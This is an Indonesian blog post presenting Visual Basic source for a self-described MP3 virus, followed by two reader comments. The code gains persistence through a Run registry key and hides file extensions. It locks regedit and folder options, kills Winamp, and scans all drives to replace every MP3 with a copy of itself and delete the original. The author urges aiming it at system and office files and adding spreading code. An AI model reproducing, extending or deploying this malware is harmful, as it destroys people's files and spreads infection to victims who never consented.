Darkside of Oktavianus

Making virus and all of them as our friends

Virus MP3 viri

Posted by oktavianus pada Oktober 22, 2007

Virus MP3 virii

Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda…yaaaaaaa….gak enak dunk…lah namanya membuat virus ya buebas dooo….masak mau ditahan2….hueheheheheh…., ciri2 yang dari virus ini adalah :

1. menon aktifkan :
– Folder Option
– Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
– mengunci regedit (seperti biasa)
– mematikan winamp secara tiba2 jika file virus aktif

bisa dilihat pada code dibawah ini:

Dim titik As String
titik = “”””

CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3”, _
titik & “c:\windows\winamp.dll.exe” & titik
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”, “1”
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”, “1”
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
CreateKey “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”, “STOP PIRACY!!!!”
CreateKey “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!”
Shell “taskkill /f /im winamp.exe”, vbHide

2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :

‘///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer

‘If InStr(cboDrives.Text, “All Hard Drives”) > 0 Then
For ictr = 0 To UBound(sDrives)
‘////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, “*.mp3”
Next
‘Else
‘////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
‘ frmMain.GetFiles cboDrives.Text, True, “*.doc”
‘End If

‘ frmMain.Visible = True

End Sub

Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer

Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String

For ictr = 66 To 90
sDrive = Chr(ictr) & “:\”
If DriveType(sDrive) = “Fixed Drive” Or DriveType(sDrive) = “Removable Drive” Then
If sAllDrives <> “” Then sAllDrives = sAllDrives & “, ”
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:

‘//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = “*.*”)

‘Screen.MousePointer = vbHourglass

‘Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long

fPath = AddBackslash(Path)

Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern

hFile = FindFirstFile(fName, WFD)

On Error Resume Next
‘///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
‘Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
‘MsgBox fPath & StripNulls(WFD.cFileName)
‘//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & “\” & App.EXEName & “.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”
DeleteFile fPath & StripNulls(WFD.cFileName)
End If

If hFile > 0 Then
While FindNextFile(hFile, WFD)
‘///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
‘Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
‘MsgBox fPath & StripNulls(WFD.cFileName)
‘//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & “\” & App.EXEName & “.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If

If SubFolder Then

hFile = FindFirstFile(fPath & “*.*”, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If

While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend

End If
FindClose hFile
‘Set li = Nothing

‘Screen.MousePointer = vbDefault

End Sub

Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun….buehehehehehe….jadi ya siap – siap mem-backup hardisk anda terutama file mp3. OKeh……ih kok jahat sekali sih…..ya sekali lagi membuat virus itu harus jahat.

——————————-TIPS SETAN———————————–

COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur…..seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak…
——————————————————————————-

Di sini kita hanya belajar bagai mana virus tersebut bekerja…bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan – pembajakan……soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan…huahahahahaha….yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang…ck ck ck kasian sudah gratis dibajak pula…nah untuk memberi pelajaran kepada orang itu gunakan program ini….hihihihihi…yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.

Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir – akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya….nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!

2 Tanggapan to “Virus MP3 viri”

  1. Sugriwo said

    bos minta anti virusnya dong ampun dech aku nyerah kapok, gak bisa bener bos. please ya.

    thank’s

    indchynt@yahoo.co.id
    ( Ian )

  2. emo sony said

    aq punya file mp3 yang korup dan apabila dihapus mp3 itu kembali lagi tapi dalam ukuran kecil kadang 16kb dan kadang dalam bentuk 0kb
    tolong balas koment saya ke e-mail saya

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: